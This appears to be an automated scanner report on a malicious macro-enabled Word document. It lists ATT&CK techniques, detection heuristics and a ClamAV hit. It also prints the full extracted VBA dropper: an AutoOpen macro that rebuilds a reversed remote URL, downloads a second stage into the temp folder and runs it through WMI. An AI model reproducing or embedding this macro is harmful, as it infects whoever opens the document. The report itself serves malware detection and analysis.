MALICIOUS
298
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1071.001 Web Protocols
T1059 Command and Scripting Interpreter
This OOXML document contains VBA macros, including an AutoOpen macro, which is a strong indicator of malicious intent. The script utilizes `CreateObject` and `URLDownloadToFile` to download and execute a second-stage payload from a remote location. The presence of these critical heuristics and the ClamAV detection strongly suggest a malicious document designed to deliver further malware.
Heuristics 8
-
ClamAV: Doc.Malware.Generic-7898874-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-7898874-0
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
#If VBA7 And Win64 Then Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _ Alias "URLDownloadToFileA" ( _ -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
' Convinces distilled functioning Set r = CreateObject("MSXML2.DOMDocument") Set sN = r.createElement("b64") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Enum Sub AutoOpen() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
' Suet john imbibe b = Environ(FG) End Function -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXmlReferenced by macro
- http://schemas.microsoft.com/office/2006/relationships/vbaProjectReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationships/imageReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8105 bytes |
SHA-256: a132fabbc751572acfe126d632cb5a211b198147abba55f49346462aef833be2 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "j"
Function jZ(HB)
' Moon
' Carried trite huge competing
' Forty-nine cud
' Asked contractor
' Decoy pleasurable maker
End Function
Function dS(my)
' Cf fisting
' Unconnected encore stations disquiet medline
' Continent rejoinder
' Closed shooting donor identifying triangular hilarious
' Goto instantaneous deutsch onslaught refuse european
' Detriment bracket dated marilyn
' Boxed calculators knife hops
' Uncanny mammoth stumps lauderdale confiscation
' Bawl exports subtle
' Convinces distilled functioning
Set r = CreateObject("MSXML2.DOMDocument")
Set sN = r.createElement("b64")
' Gets turquoise rating
' Forthcoming tvs
' Thoughts obdurate demolition
' Investigations alluring
' Village proximate
' Belize nicest cake hitch hit
' Obsequies special unscathed livestock
' Revert asbestos mid particles aggravation
' Programming autonomy borders siberia
With sN
.DataType = "bin.base64"
.Text = my
End With
' Stupefaction wakes libya
' Shoes
' Stat teaches guru potter caution
' Militant
dS = StrConv(sN.nodeTypedValue, 64)
' Acid pounce monaco jovial close walnut quebec
' Dais homeless family kirk
' Stolid false genealogy
' Segments separable overweening writs rem
End Function
Function F()
' Trinket guys tigress truculent transexuales lauderdale
' Citizens prattle
' Sweater stretcher fickle rancor
' Used cabin angola
' Fergus atheist
' Trumpeter
' Melissa
' Savage d ribbon casio sepulture
' Malevolence sophisticated charwoman reaching
' Fork
' Cv teeth lombard
' Crm
' Tulle
' Renewable transfiguration
' Hourly transmission
' Least
' Arthritis prostitution students thereat seduction
' Foreign dublin diet
' Aura
' Abler egypt
' Graduate
' Wearer sallow
' Realm scraped caution subversion
' Sport vaccination
' Inspiration processor marked fax
' Separable repeal bridges impiety mpg gzip
' Itself subterfuge texan musical
' Pedestrian
' Thereof drilling barbara savings
' Cashmere deuteronomy tahiti crisis
' Bite milieu orpheus circuit
' Troupe controls laundry stewed
' Subscriptions recipes
' Beavers saddles
End Function
Public Enum GY
' Mother-in-law domino redeem
' Blink afire carefully responsibility golden suave upload
' Deferential manor
' Absolutism sliced mohammedan pentium antediluvian
End Enum
Sub AutoOpen()
' Autocratic symphony
' Sec other
x1 = "tmp"
' Wheedle ar enable victor
' Ht voracious olivia
' Surgical beverly juvenile machines
' Lurid prelate
' Competency visitors vom twins
' Prefect tournament watson
' Break neapolitan professional
' Rugs sarah sluggish
Dim t7 As New y
' Demeter caracas
' Barnes torpedoes jaunt threats
' Skiing
' Resulting optional
' Paint sources
tv = t7.b(x1) & "\w." + x1
' Nationally
' Alder pump stanford
' Bacteria journalism
Dim arr(0 To 13)
arr(0) = Trim("~UnuthpUjBXkrsAZgh_B")
arr(1) = Trim("LlGRUtsDsduqmrfSdQUr")
arr(2) = Trim("GNm37szO18In7dzDZnw4")
arr(3) = Trim("_lerRJWYxonGIFmzpdUF")
arr(4) = Trim("sQGdQEjIWGqdI7e7-4kO")
arr(5) = Trim("URuTHt6JrTIQf0LcQ2Dk")
arr(6) = Trim("KccXV_AGjFbzAQ645QIB")
arr(7) = Trim("U6ephWplHv9_jCEN2Eaw")
arr(8) = Trim("O2ypixB2yACMwADM=x?p")
arr(9) = Trim("hp.O44fC3vMk9ygvZzQ_")
arr(10) = Trim("/egapnigol/snigulp/t")
arr(11) = Trim("netnoc-pw/erots.pohs")
arr(12) = Trim("2evol//:ptth")
' Hard-headed ne patio amalgamated biographical
' Thud final warwickshire gr grew
' Volga calabash
' Fair nat untruth heat genome
' Upturned thatll barrier challenging interference
' Connecticut nations
' Irascible
' Ist
' Tyrol dance responding
' Astral stipulation mediawiki scales dee
' For
' Saved trance legendary observatory pacify directed
' Flagrant engrave presentable state
' Polished
' Resolutions uninhabited anniversary salon
' Rhythm undercurrent acc tutorials
' Mosque migration
' Whether uh expansys inductive
t7.xp StrReverse(Join(arr, "")), tv
' Feudalism straightforward subversion greene vibrators
' Abdicate
' Ob recommends fifty-one wheelbarrow
' Forego beverages libation duties originally squint
' Confidentially
' Babel
' Ci truthfulness completes
' Better resulted
' Dumb instead
' Diplomat immunology
' Unfeigned braxton morrison bankruptcy collateral pore
Set B3 = t7.x(t7.d())
B3.Create t7.i() + " " + tv
' Lavishly checkout tried
' Shanghai declaration experiment careworn
' Notation proverbs
End Sub
Attribute VB_Name = "y"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
#If VBA7 And Win64 Then
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As LongPtr, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As LongPtr, _
ByVal lpfnCB As LongPtr _
) As Long
#Else
Private Declare Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long _
) As Long
#End If
Private Sub Class_Initialize()
' Disreputable char erudite virginian certain
' Discuss reflections sharon
' Duration ministry postcards paypal calcareous
End Sub
Private Sub Class_Terminate()
' Mother-of-pearl saturn
' Twofold shove silurian columnists deposit
' Entail
' Flash freeze balkan interpose collective guitars
' Lifetime law-abiding did
End Sub
Public Function xp(q1, V5)
' Woodsman eng notices transmutation adapted
' Lawrence mineral horn
' Bothered
xy = URLDownloadToFile(0&, q1, V5, 0&, 0&)
End Function
Public Function b(FG)
' University cry
' Intensify deuteronomy contributor
' Dredge personnel philemon
' Suet john imbibe
b = Environ(FG)
End Function
Public Sub o(V5)
' Somerset
' Cradle magpie crestfallen indelible isa conferences
' Specifics
' Jan plume recede pf
' Magnolia fallible cosmic charging
' Pledge flashlight harold entities
' Feline finishing illegally pent-up polls marlowe
' Forensic fader gary displease ie
' Subject-matter cuneiform aa drums invective northeast
' Midsummer bowl allay
End Sub
Function x(XV)
' Lull untidy itinerant rf frozen
' Our coasting watches insurgent wicket
' Political synthesis parliament
' Grounded toyota funding horse
' Intake moderate
' Pelvis gamma hobart delinquent interrogation
Set x = VBA.CreateObject(XV)
End Function
Public Function i()
' Wafer grows
' Vitiated certificates
' Particle competent del transgressor
' Decorative gangway paraphrase biographer
' Passively philology
' Intestine
' Diy refused
' Eliminated pedigree gentleman nome tribunal
' Squad storied unopened passers-by
' Tions confessor reiterate oral
' Garmin publishing maryland
i = dS(StrReverse("=IzMyZ3cnVmc"))
End Function
Public Function d()
' Generate
' Induction overbearing route shows windmill
' Sixth caused mercurial miles smudge
' Mildew props probabilities
' Poetry solstice guts
' Yourself idiocy epirus dear
' Bakery incorporeal administration
' Opprobrium
' Guard flinching sleep complement dan
' Ambient tries
' Hose km hypnotism
d = StrReverse(dS("c3NlY29yUF8yM25pVzpzdG1nbW5pdw=="))
End Function
Attribute VB_Name = "frm"
Attribute VB_Base = "0{7637D207-6D87-492A-8056-D3C3965BF4D6}{64AA69FE-FF11-42FD-97E3-47456F694C01}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 50176 bytes |
SHA-256: 14ce5d88eef0cef92ce3a14c91ae10f710c37d52edc065fac0fb6e7b5007d39e |
|||
|
Detection
ClamAV:
Doc.Malware.Generic-7898874-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.